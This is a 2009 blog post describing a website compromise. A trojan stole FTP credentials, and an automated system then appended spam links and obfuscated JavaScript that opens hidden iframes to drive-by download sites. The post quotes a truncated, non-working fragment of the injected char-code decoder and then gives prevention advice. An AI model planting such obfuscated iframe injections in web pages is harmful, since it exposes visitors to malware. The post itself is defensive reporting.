All Your iFRAMEs Point to Us

Author: seven February 11, 2009

aybabtuDefacing a website is least form of site hacking these days (please, don't deface us because of this statement :) ). Defacing usually means changing the hacked website's xhtml files on server or in transport between the server and the client. Completely defaced website attracts attention for a limited number of time, and the whole deal is quickly forgotten. However, defacing a site by silently injecting a 1x1 iframes, javascript or massive amount of links/subpages can be more lucrative for spammers (link building, visitor stat fraud, malware spread etc.), more horrifying to your business (you will loose visitors while you are blacklisted) and worst of it all - it can't be that easily detected.

I recently witnessed pretty horrible deface. A pal of mine got infected with trojan which sent out his password from FTP programs to automated system, which automatically ftpd to his sites, downloaded all files, changed .html files by injecting tons of spam/porn/viagra links and hex javascript code for opening up iframes to malicious sites containing more trojans, and then reuploaded everything up on my pals innocent website. Every visitor to once innocent website was attacked by drive-by downloads of trojans.
This was appended to all html files:

 var temp="",i,c=0,out=""; var if_uniq_var="tf100"; var start_time="29 Jan 2009 23:39:27"; var 
str="60!105!102!11  ...  !97!109!101!62!"; l=str.length; 

All that javascript actually outputs only this (don't click on the link):

Drive-by downloads are caused by URLs that attempt to exploit their visitors and cause malware to be installed and run automatically. Google's analysis of billions of URLs over a 10 month period shows that over 3 million malicious URLs, initiate drive-by downloads. Approximately 1.3% of all incoming search queries to Google’s search engine returned at least one URL labeled as malicious in the results page (checkout Google Technical Report).

Matt Cutts (Google) in his Preventing Virtual Blight presentation suggest doing some pretty basic stuff which almost anybody can apply, and I must admit creating Google alert for "Viagra" is pretty unique.

CEO/CTO at Nivas®
Neven Jacmenović has been passionately involved with computers since late 80s, the age of Atari and Commodore Amiga. As one of internet industry pioneers in Croatia, since 90s, he has been involved in making of many award winning, innovative and successful online project. He is experienced full stack web developer, analyst and system engineer. In his spare time, Neven is transforming retro-futuristic passion into various golang, Adobe Flash and JavaScript/WebGL projects.

    One thought on “All Your iFRAMEs Point to Us”

    Leave a Reply

    Your email address will not be published. Required fields are marked *